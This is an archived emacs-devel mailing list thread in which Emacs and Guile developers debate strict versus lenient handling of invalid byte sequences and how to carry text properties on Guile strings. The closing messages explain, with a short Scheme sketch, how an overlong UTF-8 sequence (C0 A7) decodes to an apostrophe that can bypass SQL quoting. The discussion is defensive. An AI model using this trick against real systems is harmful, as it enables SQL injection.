@ 2014-10-10 15:28                                                             ` Eli Zaretskii
  2014-10-11  1:15                                                               ` Richard Stallman
  0 siblings, 1 reply; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-10 15:28 UTC (permalink / raw)
  To: rms; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen

> Date: Fri, 10 Oct 2014 10:24:36 -0400
> From: Richard Stallman <rms@gnu.org>
> CC: dak@gnu.org, mhw@netris.org, dmantipov@yandex.ru,
> 	emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca,
> 	stephen@xemacs.org
> 
>     > I don't think we are talking about the same thing.  I am talking about Lisp
>     > functions to do conversions on text that does NOT come from files.
> 
>     ... Emacs treats all of these cases the same.
> 
> They don't HAVE to be treated the same.  We are talking about changes,
> here.

They will be very deep and invasive changes, because currently the
encoding/decoding routines don't know the purpose of the stuff they
are producing.

> But changes may not be needed.  All operations that do encoding or
> decoding allow explicit specification of the coding system.

Of course, they do.  But the issue at hand is precisely whether it is
the application's responsibility to explicitly specify conversions
that will be strict wrt invalid byte sequences, or should Emacs do
that by default.  There's no argument that there are facilities in
Emacs to do both.




* Re: Emacs Lisp's future
  2014-10-10 14:24                                                           ` Richard Stallman
@ 2014-10-10 15:38                                                             ` Eli Zaretskii
  2014-10-11  1:17                                                               ` Richard Stallman
       [not found]                                                             ` <<83r3yg9bpu.fsf@gnu.org>
  1 sibling, 1 reply; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-10 15:38 UTC (permalink / raw)
  To: rms; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen

> Date: Fri, 10 Oct 2014 10:24:37 -0400
> From: Richard Stallman <rms@gnu.org>
> CC: dak@gnu.org, mhw@netris.org, dmantipov@yandex.ru,
> 	emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca,
> 	stephen@xemacs.org
> 
>     > Asking about invalid UTF-8 in a file could be a nuisance, but how much
>     > of a nuisance depends on the details of what we do.  Since this has
>     > some security implications, it is worth a small amount of nuisance.
> 
>     That wasn't what users felt, overwhelmingly.
> 
> Felt when?

When we tried to be more cautious about these issues than we are now.

> About what behavior?

There are several examples, and I'm not sure I recall all the details
accurately.

One such situation goes like this:

  Visit a file (or receive from another process text) that is encoded
  in Latin-1.

  Insert some text that cannot be encoded in Latin-1, and try saving
  the buffer (or sending it to a process).

Originally, Emacs would complain that Latin-1 cannot be used, and
ask the user to select a different encoding.  Then users of UTF-8
locales complained that these prompts were annoyances, that they
expect Emacs to use UTF-8 silently, without any questions, as long as
UTF-8 can encode the result.  So now that is what we do.

> I asked
> 
>     > What exactly did we try before?
> 
> and you responded
> 
>     AFAIR, we tried converting raw bytes into valid non-ASCII characters,
>     and perhaps also replacing them with the equivalent of u+FFFD, the
>     Unicode "replacement character".
> 
> But those are both different from the proposal I'm discussing.

How are they different?

In any case, I hope you are not expecting to hear about user reactions
to any of the proposals that haven't been tried yet.  Such
expectations are IMO unreasonable.  What I (and I think also David)
were trying to show is that _similar_ situations were met with user
complaints and outcry, and that we are where we are today because we
heeded those complaints.  I see no reason to believe that user
reaction to the proposals being brought up here will be any different,
just because we tell them "it's about their security" and "trust us,
we know better".  Of course, one can reject the analogies and claim
that "this is different" and/or "this time the reaction will be
different", and there's nothing I could produce as counter-argument to
that except gut feelings based on our previous experience.




* RE: Emacs Lisp's future
       [not found]                                                             ` <<83r3yg9bpu.fsf@gnu.org>
@ 2014-10-10 16:02                                                               ` Drew Adams
  2014-10-10 16:10                                                                 ` Eli Zaretskii
  0 siblings, 1 reply; 261+ messages in thread
From: Drew Adams @ 2014-10-10 16:02 UTC (permalink / raw)
  To: Eli Zaretskii, rms
  Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen

>   Visit a file (or receive from another process text) that is
>   encoded in Latin-1. Insert some text that cannot be encoded in
>   Latin-1, and try saving the buffer (or sending it to a process).
> 
> Originally, Emacs would complain that Latin-1 cannot be used, and
> ask the user to select a different encoding.  Then users of UTF-8
> locales complained that these prompts were annoyances, that they
> expect Emacs to use UTF-8 silently, without any questions, as long
> as UTF-8 can encode the result.  So now that is what we do.

Is that preference (bother me versus silently change the encoding)
under individual-user control?

If not, why not create a user option for it?  The default behavior
can be the current behavior.




* Re: Emacs Lisp's future
  2014-10-10 16:02                                                               ` Drew Adams
@ 2014-10-10 16:10                                                                 ` Eli Zaretskii
  0 siblings, 0 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-10 16:10 UTC (permalink / raw)
  To: Drew Adams; +Cc: dak, rms, mhw, dmantipov, emacs-devel, handa, monnier, stephen

> Date: Fri, 10 Oct 2014 09:02:09 -0700 (PDT)
> From: Drew Adams <drew.adams@oracle.com>
> Cc: dak@gnu.org, mhw@netris.org, dmantipov@yandex.ru, emacs-devel@gnu.org,
>         handa@gnu.org, monnier@iro.umontreal.ca, stephen@xemacs.org
> 
> >   Visit a file (or receive from another process text) that is
> >   encoded in Latin-1. Insert some text that cannot be encoded in
> >   Latin-1, and try saving the buffer (or sending it to a process).
> > 
> > Originally, Emacs would complain that Latin-1 cannot be used, and
> > ask the user to select a different encoding.  Then users of UTF-8
> > locales complained that these prompts were annoyances, that they
> > expect Emacs to use UTF-8 silently, without any questions, as long
> > as UTF-8 can encode the result.  So now that is what we do.
> 
> Is that preference (bother me versus silently change the encoding)
> under individual-user control?

No, not AFAIK.




* Re: Emacs Lisp's future
  2014-10-05 21:49                                     ` Richard Stallman
  2014-10-06  3:34                                       ` Stephen J. Turnbull
@ 2014-10-10 20:41                                       ` Mark H Weaver
  2014-10-10 21:56                                         ` Christopher Allan Webber
  2014-10-11  1:17                                         ` Richard Stallman
  1 sibling, 2 replies; 261+ messages in thread
From: Mark H Weaver @ 2014-10-10 20:41 UTC (permalink / raw)
  To: Richard Stallman
  Cc: dak, dmantipov, emacs-devel, handa, monnier, eliz, stephen

Richard Stallman <rms@gnu.org> writes:

>     Supporting property lists in Scheme raises difficult questions
>
> Do you mean text properties in strings, as in Emacs Lisp?

Yes.

Having mulled it over, I've come to the conclusion that we can add text
properties to Guile strings without adding new security risks to
competently written Scheme code, with the following caveat: text
properties must be invisible to all existing Scheme procedures,
including 'equal?' and 'write'.

However, as an exception to the caveat above, I think we can allow
existing Scheme string operations such as 'substring' and
'string-append' to propagate the text properties.

If you'd like to learn how I came to these conclusions, continue
reading, otherwise you can stop here.

* * *

Guile already supports weak-key (eq) hash tables, upon which we've
trivially implemented something called "object-properties":

  (define my-property (make-object-property))
  (set! (my-property <obj>) 'foo)
  (my-property <obj>) => foo

Effectively, this allows anyone to add a new private field to any
object.  The new field is invisible to anything that doesn't know about
the object property, including equality predicates and all other
standard procedures.

So we could use object-properties to add text properties to Guile
strings.  Therefore, we can regard it as a mere efficiency hack to add a
new field to our string objects, as long as the semantics are the same
as if the new field was an object-property.
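
To make the invisibility claim concrete, here is a minimal sketch.  It
assumes only Guile's 'make-object-property'; the name 'text-props' is
made up for illustration and is not an existing API.

```scheme
;; Sketch only: `text-props' is an illustrative name, not a Guile API.
(define text-props (make-object-property))

;; string-copy yields two distinct string objects with equal contents.
(define plain (string-copy "monkey"))
(define tagged (string-copy "monkey"))

;; Attach a property list to one of the two objects.
(set! (text-props tagged) '(face bold))

;; The property takes no part in the comparison.
(define same-contents? (equal? plain tagged))

;; `write' prints only the characters, not the property.
(define printed (with-output-to-string (lambda () (write tagged))))

;; Only code that knows about `text-props' can see the property.
(define tagged-props (text-props tagged))
(define plain-props (text-props plain))
```

Here 'same-contents?' is #t and 'plain-props' is #f, so code that does
not know about 'text-props' cannot tell the two strings apart.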

However, this still leaves open the question of whether *propagating*
these text properties to newly-allocated strings (by 'substring',
'string-append', etc) adds new risks.

This next step makes me a bit uneasy, but I think it will also be okay,
because standard Scheme does not require 'eq?' to be usable on
characters, i.e. it does not require characters to be immediates or even
interned.

This means that we could, in principle, use object-properties to
associate text properties with the characters themselves, instead of
with the string objects.  This would quite naturally lead to them being
copied by string operations such as 'substring' and 'string-append'.

Therefore, it seems to me that adding text properties to Guile strings
does not add any security issues that are not already present in
standard Scheme.

What do you think?

      Mark



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-10 20:41                                       ` Mark H Weaver
@ 2014-10-10 21:56                                         ` Christopher Allan Webber
  2014-10-10 22:56                                           ` Drew Adams
  2014-10-11  1:17                                         ` Richard Stallman
  1 sibling, 1 reply; 261+ messages in thread
From: Christopher Allan Webber @ 2014-10-10 21:56 UTC (permalink / raw)
  To: Mark H Weaver
  Cc: dak, Richard Stallman, dmantipov, emacs-devel, handa, monnier,
	eliz, stephen

Mark H Weaver writes:

> Richard Stallman <rms@gnu.org> writes:
>
>>     Supporting property lists in Scheme raises difficult questions
>>
>> Do you mean text properties in strings, as in Emacs Lisp?
>
> Yes.
>
> Having mulled it over, I've come to the conclusion that we can add text
> properties to Guile strings without adding new security risks to
> competently written Scheme code, with the following caveat: text
> properties must be invisible to all existing Scheme procedures,
> including 'equal?' and 'write'.
>
> However, as an exception to the caveat above, I think we can allow
> existing Scheme string operations such as 'substring' and
> 'string-append' to propagate the text properties.
>
> If you'd like to learn how I came to these conclusions, continue
> reading, otherwise you can stop here.
>
> * * *
>
> Guile already supports weak-key (eq) hash tables, upon which we've
> trivially implemented something called "object-properties":
>
>   (define my-property (make-object-property))
>   (set! (my-property <obj>) 'foo)
>   (my-property <obj>) => foo
>
> Effectively, this allows anyone to add a new private field to any
> object.  The new field is invisible to anything that doesn't know about
> the object property, including equality predicates and all other
> standard procedures.
>
> So we could use object-properties to add text properties to Guile
> strings.  Therefore, we can regard it as a mere efficiency hack to add a
> new field to our string objects, as long as the semantics are the same
> as if the new field was an object-property.
>
> However, this still leaves open the question of whether *propagating*
> these text properties to newly-allocated strings (by 'substring',
> 'string-append', etc) adds new risks.
>
> This next step makes me a bit uneasy, but I think it will also be okay,
> because standard Scheme does not require 'eq?' to be usable on
> characters, i.e. it does not require characters to be immediates or even
> interned.
>
> This means that we could, in principle, use object-properties to
> associate text properties with the characters themselves, instead of
> with the string objects.  This would quite naturally lead to them being
> copied by string operations such as 'substring' and 'string-append'.
>
> Therefore, it seems to me that adding text properties to Guile strings
> does not add any security issues that are not already present in
> standard Scheme.
>
> What do you think?
>
>       Mark

It sounds, if I am reading this right, like the mechanism by which
properties are being added to Scheme strings means that no actual
changes need to be made to Guile strings' data structures.  If true, that
sounds like a very efficient and ideal solution because it is so
generic.

In fact, I gave it a whirl... you mean something like this?

  (define elisp-properties (make-object-property))
  
  (define (elisp-propertize string . args)
    (let ((copied-string (string-copy string)))
      (set! (elisp-properties copied-string) args)
      copied-string))
  
  (define my-monkey
    (elisp-propertize "monkey" 'eats 'bananas))
  ;; => "monkey"
  
  (elisp-properties my-monkey)
  ;; => (eats bananas)

That's awesome!  And it doesn't feel like we're changing Guile in any
core way just to accommodate elisp, and it seems bidirectionally
compatible...

But as for copying around property lists when copying strings, making
substrings, etc, I think I'm more uncomfortable with that idea using
default Guile methods.  That seems like changing the language in a
substantial way that may even have strange performance issues or
unexpected side effects... would we do such a thing if this were
anything other than Emacs?  Would we do it for Javascript?

But it doesn't seem to me like we need to worry: why not just add a
library like this:


  (use-modules (language elisp string-tools))
  
  (elisp-substring (elisp-propertize "monkeys" 'eat 'bananas) 3 6)
  ;; => this would return "key", but with object properties of
  ;;    (eat bananas)
  
  (elisp-substring "monkeys" 3 6)
  ;; => this would return "key", but with no object properties

  (substring (elisp-propertize "monkeys" 'eat 'bananas) 3 6)
  ;; => this would return "key" with no object properties


The version of substring provided in emacs lisp would of course be
elisp-substring, and strings would work between guile and emacs, but as
for copying around strings with properties, only functions in guile
which care about this would have to deal with it and deal with any
related concerns.
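
A rough sketch of how such an 'elisp-substring' might look, assuming
the object-property approach above.  Both 'elisp-properties' and
'elisp-substring' are hypothetical names, and for simplicity the
properties here apply to the whole string; real Emacs text properties
cover character ranges, so a real version would also have to trim and
shift those ranges.

```scheme
;; Hypothetical names throughout; only make-object-property,
;; string-copy and substring are existing Guile procedures.
(define elisp-properties (make-object-property))

(define (elisp-propertize string . args)
  ;; Copy first, so the caller's string object is left untouched.
  (let ((copied-string (string-copy string)))
    (set! (elisp-properties copied-string) args)
    copied-string))

(define (elisp-substring string start end)
  ;; Take the substring with the ordinary Scheme procedure, then carry
  ;; over whatever properties the source string had, if any.
  (let ((result (substring string start end))
        (props (elisp-properties string)))
    (when props
      (set! (elisp-properties result) props))
    result))
```

With this, the plain 'substring' keeps behaving exactly as before, and
only callers that ask for 'elisp-substring' pay for the propagation.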

 - Chris



^ permalink raw reply	[flat|nested] 261+ messages in thread

* RE: Emacs Lisp's future
  2014-10-10 21:56                                         ` Christopher Allan Webber
@ 2014-10-10 22:56                                           ` Drew Adams
  0 siblings, 0 replies; 261+ messages in thread
From: Drew Adams @ 2014-10-10 22:56 UTC (permalink / raw)
  To: Christopher Allan Webber, Mark H Weaver
  Cc: dak, Richard Stallman, dmantipov, emacs-devel, handa, monnier,
	eliz, stephen

> > Richard Stallman <rms@gnu.org> writes:
> >> Do you mean text properties in strings, as in Emacs Lisp?
> > Yes.
> >
> > Having mulled it over, I've come to the conclusion that we can add
> > text properties to Guile strings...with the following caveat: text
> > properties must be invisible to all existing Scheme procedures,
> > including 'equal?' and 'write'....
> >
> > we could, in principle, use object-properties to associate text
> > properties with the characters themselves, instead of with the
> > string objects.  This would quite naturally lead to them being
> > copied by string operations such as 'substring' and 'string-
> > append'.
> 
> ...you mean something like this?
>   (define elisp-properties (make-object-property))
>   (define (elisp-propertize string . args)
>     (let ((copied-string (string-copy string)))
>       (set! (elisp-properties copied-string) args)
>       copied-string))
>   (define my-monkey (elisp-propertize "monkey" 'eats 'bananas))
>   (elisp-properties my-monkey) ;; => (eats bananas)

How would this relate to a future Guile implementation of
Emacs-Lisp text (and overlay) properties, whose values can be
arbitrary Emacs-Lisp thingies?

I know this question jumps the gun, but can we assume that if
an Emacs user puts an arbitrary Lisp thing (e.g., a particular
cons) on some text as a text-property value that that will carry
through to the Scheme implementation in such a way that s?he
can still manipulate the data of that value (e.g. modify the
particular cons cell components)?

IOW, will an Emacs user have the same abilities, and see the
same behavior, wrt text and overlay properties as s?he has and
sees now with Emacs Lisp?



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-10 15:28                                                             ` Eli Zaretskii
@ 2014-10-11  1:15                                                               ` Richard Stallman
  2014-10-11  7:18                                                                 ` David Kastrup
  2014-10-11  7:18                                                                 ` Eli Zaretskii
  0 siblings, 2 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-11  1:15 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    > They don't HAVE to be treated the same.  We are talking about changes,
    > here.

    They will be very deep and invasive changes, because currently the
    encoding/decoding routines don't know the purpose of the stuff they
    are producing.

No, it's just a matter of setting some parameter to specify a particular
decision in decoding or encoding behavior.

    > But changes may not be needed.  All operations that do encoding or
    > decoding allow explicit specification of the coding system.

    Of course, they do.  But the issue at hand is precisely whether it is
    the application's responsibility to explicitly specify conversions
    that will be strict wrt invalid byte sequences, or should Emacs do
    that by default.

Yes.

It will be easy to specify one or the other, so why not make the default
be strict, except in the primitives that operate on files?

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-10 20:41                                       ` Mark H Weaver
  2014-10-10 21:56                                         ` Christopher Allan Webber
@ 2014-10-11  1:17                                         ` Richard Stallman
  1 sibling, 0 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-11  1:17 UTC (permalink / raw)
  To: Mark H Weaver; +Cc: dak, dmantipov, emacs-devel, handa, monnier, eliz, stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    Having mulled it over, I've come to the conclusion that we can add text
    properties to Guile strings without adding new security risks to
    competently written Scheme code, with the following caveat: text
    properties must be invisible to all existing Scheme procedures,
    including 'equal?' and 'write'.

That makes sense to me.

    However, as an exception to the caveat above, I think we can allow
    existing Scheme string operations such as 'substring' and
    'string-append' to propagate the text properties.

I agree, that's safe.  If the text property values have no effect on
the results of proper Scheme code, then whatever values Scheme
primitives put in the text properties, they can't hurt anything.

The reason why it is important to implement these at the lowest possible
level is efficiency.  If every string in Emacs had to be a higher-level
abstract object, they would surely be slower.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-10 15:38                                                             ` Eli Zaretskii
@ 2014-10-11  1:17                                                               ` Richard Stallman
  2014-10-11  7:23                                                                 ` David Kastrup
  2014-10-11  7:33                                                                 ` Eli Zaretskii
  0 siblings, 2 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-11  1:17 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    Originally, Emacs would complain that Latin-1 cannot be used, and
    asked the user to select a different encoding.

That is about Latin-1.  What did Emacs do, at that time, with UTF-8?

						    Then users of UTF-8
    locales complained that these prompts were annoyances, that they
    expect Emacs to use UTF-8 silently, without any questions, as long as
    UTF-8 can encode the result.

It is not clear what "As long as UTF-8 can encode the result" means,
concretely.  Whether Emacs's UTF-8 encoding can encode the raw bytes
is a matter of our decision.  Strictly speaking, UTF-8 can't encode
the raw bytes.

Thus, it seems that asking for confirmation before writing raw bytes
in UTF-8 is consistent with that expectation, and writing the raw
bytes without asking for confirmation is also consistent with that.

I am not trying to play word games with you.  I think you probably had
a more specific point in mind, but you need to present it clearly.

    >     > What exactly did we try before?
    > 
    > and you responded
    > 
    >     AFAIR, we tried converting raw bytes into valid non-ASCII characters,
    >     and perhaps also replacing them with the equivalent of u+FFFD, the
    >     Unicode "replacement character".
    > 
    > But those are both different from the proposal I'm discussing.

    How are they different?

The first of them was to convert the raw bytes into valid non-ASCII characters.
(When?  When reading the file?  When writing the file?)  You have not
described that behavior clearly, but either way it is not the same as
the proposal we are discussing now.  This proposal is to ask for
confirmation before encoding a file with raw bytes.

The second was to "replace" these codes with something else.  (When?
When reading the file?  When writing the file?)  Either way it is not
the same as the proposal we are discussing now.  This proposal does
not replace any characters.

    In any case, I hope you are not expecting to hear about user reactions
    to any of the proposals that haven't been tried yet.

That idea did not come from me.  YOU said they had already reacted to
THIS proposal.

      What I (and I think also David)
    were trying to show is that _similar_ situations were met with user
    complaints and outcry, and that we are where we are today because we
    heeded those complaints.

There are many ways for two different designs to be "similar".  They
are also different.  The details are crucial for users' reactions.  I
think the people who objected to those behaviors, which involved
changing the file contents, might not mind the confirmation much.


-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-11  1:15                                                               ` Richard Stallman
@ 2014-10-11  7:18                                                                 ` David Kastrup
  2014-10-12  3:22                                                                   ` Richard Stallman
  2014-10-11  7:18                                                                 ` Eli Zaretskii
  1 sibling, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-11  7:18 UTC (permalink / raw)
  To: Richard Stallman
  Cc: mhw, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii,
	stephen

Richard Stallman <rms@gnu.org> writes:

> [[[ To any NSA and FBI agents reading my email: please consider    ]]]
> [[[ whether defending the US Constitution against all enemies,     ]]]
> [[[ foreign or domestic, requires you to follow Snowden's example. ]]]
>
>     > They don't HAVE to be treated the same.  We are talking about changes,
>     > here.
>
>     They will be very deep and invasive changes, because currently the
>     encoding/decoding routines don't know the purpose of the stuff they
>     are producing.
>
> No, it's just a matter of setting some parameter to specify a particular
> decision in decoding or encoding behavior.
>
>     > But changes may not be needed.  All operations that do encoding or
>     > decoding allow explicit specification of the coding system.
>
>     Of course, they do.  But the issue at hand is precisely whether it is
>     the application's responsibility to explicitly specify conversions
>     that will be strict wrt invalid byte sequences, or should Emacs do
>     that by default.
>
> Yes.
>
> It will be easy to specify one or the other, so why not make the default
> be strict, except in the primitives that operate on files?

Because we had that already.  It made the users mad, it threw spanners
in the work of the programmers, and there is a large body of software
developed before then and since then that depends on Emacs working
rather than throwing a fit.

When we lost users in large droves to XEmacs at the time Emacs became
the loss leader for multibyte encodings by making MULE mandatory, a
significant number of those users who went were the ones not even using
non-ASCII locales, and they would purportedly not even have noticed a
difference with the files they were supposed to be working with.  But in
practice, files and communications don't pass the purity tests.

When you have a secretary working for you, you are not interested in the
secretary getting each grammatical error in a letter you got sent
circled in red.

When I read a mail from an issue ticketing system that has not
encoded/decoded some mail headers properly along with the rest, I still
want to be able to read what is there _before_ making decisions about
encodings.  Most of the time I don't want to make _any_ decision and
just go ahead with what I got.  And frankly: if Emacs refuses to show me
what it got before I make a decision, I have no _base_ for making a
decision in the first place.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-11  1:15                                                               ` Richard Stallman
  2014-10-11  7:18                                                                 ` David Kastrup
@ 2014-10-11  7:18                                                                 ` Eli Zaretskii
  2014-10-11 23:51                                                                   ` Mark H Weaver
  2014-10-12  3:24                                                                   ` Richard Stallman
  1 sibling, 2 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-11  7:18 UTC (permalink / raw)
  To: rms; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen

> Date: Fri, 10 Oct 2014 21:15:26 -0400
> From: Richard Stallman <rms@gnu.org>
> CC: dak@gnu.org, mhw@netris.org, dmantipov@yandex.ru,
> 	emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca,
> 	stephen@xemacs.org
> 
>     > They don't HAVE to be treated the same.  We are talking about changes,
>     > here.
> 
>     They will be very deep and invasive changes, because currently the
>     encoding/decoding routines don't know the purpose of the stuff they
>     are producing.
> 
> No, it's just a matter of setting some parameter to specify a particular
> decision in decoding or encoding behavior.

Specify, and then drag it all the way down the encoding/decoding
machinery.

>     > But changes may not be needed.  All operations that do encoding or
>     > decoding allow explicit specification of the coding system.
> 
>     Of course, they do.  But the issue at hand is precisely whether it is
>     the application's responsibility to explicitly specify conversions
>     that will be strict wrt invalid byte sequences, or should Emacs do
>     that by default.
> 
> Yes.
> 
> It will be easy to specify one or the other, so why not make the default
> be strict, except in the primitives that operate on files?

Because I believe this will annoy users and cause a lot of
complaining.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-11  1:17                                                               ` Richard Stallman
@ 2014-10-11  7:23                                                                 ` David Kastrup
  2014-10-11  7:33                                                                 ` Eli Zaretskii
  1 sibling, 0 replies; 261+ messages in thread
From: David Kastrup @ 2014-10-11  7:23 UTC (permalink / raw)
  To: Richard Stallman
  Cc: mhw, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii,
	stephen

Richard Stallman <rms@gnu.org> writes:

> There are many ways for two different designs to be "similar".  They
> are also different.  The details are crucial for users' reactions.  I
> think the people who objected to those behaviors, which involved
> changing the file contents, might not mind the confirmation much.

That kind of choice would require the assumption that any file operation
(and any other encoding/decoding action) is an immediate, direct, and
obvious consequence of a user interaction with Emacs.

That is not the case, and it has never been.  And even where it is the
case, there is nothing to be gained by letting Emacs refuse viewing
files.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-11  1:17                                                               ` Richard Stallman
  2014-10-11  7:23                                                                 ` David Kastrup
@ 2014-10-11  7:33                                                                 ` Eli Zaretskii
  2014-10-12  3:22                                                                   ` Richard Stallman
  1 sibling, 1 reply; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-11  7:33 UTC (permalink / raw)
  To: rms; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen

> Date: Fri, 10 Oct 2014 21:17:15 -0400
> From: Richard Stallman <rms@gnu.org>
> CC: dak@gnu.org, mhw@netris.org, dmantipov@yandex.ru,
> 	emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca,
> 	stephen@xemacs.org
> 
>     Originally, Emacs would complain that Latin-1 cannot be used, and
>     asked the user to select a different encoding.
> 
> That is about Latin-1.  What did Emacs do, at that time, with UTF-8?

The situation I described is with text encodable by UTF-8, but not by
Latin-1.  So it has no analogue when UTF-8 is used to begin with.

> 						    Then users of UTF-8
>     locales complained that these prompts were annoyances, that they
>     expect Emacs to use UTF-8 silently, without any questions, as long as
>     UTF-8 can encode the result.
> 
> It is not clear what "As long as UTF-8 can encode the result" means,
> concretely.  Whether Emacs's UTF-8 encoding can encode the raw bytes
> is a matter of our decision.  Strictly speaking, UTF-8 can't encode
> the raw bytes.

I wasn't talking about raw bytes, I was talking about characters
outside of Latin-1 charset, like Cyrillic or Polish.

>     >     > What exactly did we try before?
>     > 
>     > and you responded
>     > 
>     >     AFAIR, we tried converting raw bytes into valid non-ASCII characters,
>     >     and perhaps also replacing them with the equivalent of u+FFFD, the
>     >     Unicode "replacement character".
>     > 
>     > But those are both different from the proposal I'm discussing.
> 
>     How are they different?
> 
> The first of them was to convert the raw bytes into valid non-ASCII characters.
> (When?  When reading the file?  When writing the file?)  You have not
> described that behavior clearly, but either way it is not the same as
> the proposal we are discussing now.  This proposal is to ask for
> confirmation before encoding a file with raw bytes.

Our experience with such prompts is that they are perceived as
annoyances, no matter whether they happen at read or at write time.

> The second was to "replace" these codes with something else.  (When?
> When reading the file?  When writing the file?)  Either way it is not
> the same as the proposal we are discussing now.  This proposal does
> not replace any characters.

What will Emacs do, under this proposal, if the user is asked whether
to keep the original raw bytes and answers NO?  I thought Emacs would
replace those invalid sequences with something, so I reminded you of
what happened the last time we tried something similar.

Moreover, I think at least some of the suggestions in this thread,
perhaps not from you, were not to ask any questions at all, and
"handle" these invalid sequences automatically when Emacs reads the
text from its source, whatever that is.  Under that suggestion, the
only reasonable behavior is to replace the invalid sequences with
special valid characters, such as u+FFFD, which resembles what we
tried doing in the past.

>     In any case, I hope you are not expecting to hear about user reactions
>     to any of the proposals that haven't been tried yet.
> 
> That idea did not come from me.  YOU said they had already reacted to
> THIS proposal.

Then my imperfect wording caused your misunderstanding, for which I'm
sorry.

>       What I (and I think also David)
>     were trying to show is that _similar_ situations were met with user
>     complaints and outcry, and that we are where we are today because we
>     heeded those complaints.
> 
> There are many ways for two different designs to be "similar".  They
> are also different.  The details are crucial for users' reactions.  I
> think the people who objected to those behaviors, which involved
> changing the file contents, might not mind the confirmation much.

Well, this is where we disagree, and as I mentioned, such
disagreements cannot be reconciled when our degrees of reliance on
past experience in similar situations differ.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06  6:21                                       ` Mark H Weaver
  2014-10-06 15:08                                         ` Eli Zaretskii
@ 2014-10-11 18:34                                         ` Florian Weimer
  1 sibling, 0 replies; 261+ messages in thread
From: Florian Weimer @ 2014-10-11 18:34 UTC (permalink / raw)
  To: Mark H Weaver
  Cc: dak, rms, dmantipov, emacs-devel, handa, monnier, eliz, stephen

* Mark H. Weaver:

> To give an example, consider a procedure that needs to pass a string
> from an untrusted source to an SQL query.  To do this safely, it needs
> to quote the string.  I haven't researched how to properly quote SQL
> string literals, but in general, quoting is typically done by
> recognizing some set of special characters that must be escaped, and
> allowing all other characters through unmodified.

For a truly robust solution, you need parameterized queries.  Most
database servers support other encodings besides UTF-8, and the
required quoting logic can be quite complicated.

> However, "raw byte" code points can be used to bypass such a quoting
> mechanism, and thus send an unescaped closing quote to the SQL database
> followed by arbitrary SQL commands.

This can happen with certain multi-byte character sets as well.

> UTF-8 decoders are supposed to detect and reject these "overlong"
> encodings, but it is likely that many programs fail to do this.

That's not very common anymore.
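
For readers who have not met overlong encodings, a small sketch of the
two-byte case only.  The procedure names are made up for illustration,
and a real decoder has to cover the three- and four-byte forms as well.

```scheme
;; Illustrative names; this handles two-byte sequences only.

;; Naive decoding: combine the payload bits without any validity check.
(define (naive-decode-2 b0 b1)
  (integer->char (logior (ash (logand b0 #x1F) 6)
                         (logand b1 #x3F))))

;; Strict decoding: the lead byte must be in #xC2..#xDF and the
;; continuation byte in #x80..#xBF.  Lead bytes #xC0 and #xC1 can only
;; start overlong encodings of ASCII characters, so they are rejected.
(define (strict-decode-2 b0 b1)
  (if (and (<= #xC2 b0 #xDF) (<= #x80 b1 #xBF))
      (naive-decode-2 b0 b1)
      (error "invalid or overlong two-byte UTF-8 sequence" b0 b1)))

;; The bytes C0 A7 are an overlong spelling of the apostrophe (U+0027).
(define smuggled-quote (naive-decode-2 #xC0 #xA7))
```

The naive version turns C0 A7 into an apostrophe that a byte-level
quoting pass never saw, while 'strict-decode-2' signals an error for
the same input.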

> To cope with this, the Unicode standards require that UTF-8 codecs
